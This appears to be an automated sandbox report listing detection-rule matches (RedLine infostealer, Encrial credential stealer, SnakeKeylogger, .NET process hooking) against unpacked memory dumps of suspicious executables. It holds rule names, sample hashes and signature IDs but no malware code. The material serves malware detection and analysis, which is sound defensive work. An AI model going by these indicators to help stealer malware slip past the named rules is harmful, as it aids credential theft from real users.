Source: 13.1.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.21740000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.1.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.1.fpnevlzQ.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.1.fpnevlzQ.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.1.fpnevlzQ.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.3.fpnevlzQ.pif.1d29f158.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.1.fpnevlzQ.pif.4dc8c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.21740000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.1.fpnevlzQ.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.Qzlvenpf.PIF.211acbd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.fpnevlzQ.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fpnevlzQ.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.1.fpnevlzQ.pif.4dc8c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PWSW6GK3ZC.exe.213cb7a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.30cc0000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.2de611e6.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.1eeb02c6.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.1.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.4dc8c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.fpnevlzQ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.fpnevlzQ.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.30630000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PWSW6GK3ZC.exe.211aa5b8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.fpnevlzQ.pif.21e90000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.21f70000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.30630f20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fpnevlzQ.pif.1f830f20.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fpnevlzQ.pif.21f70000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
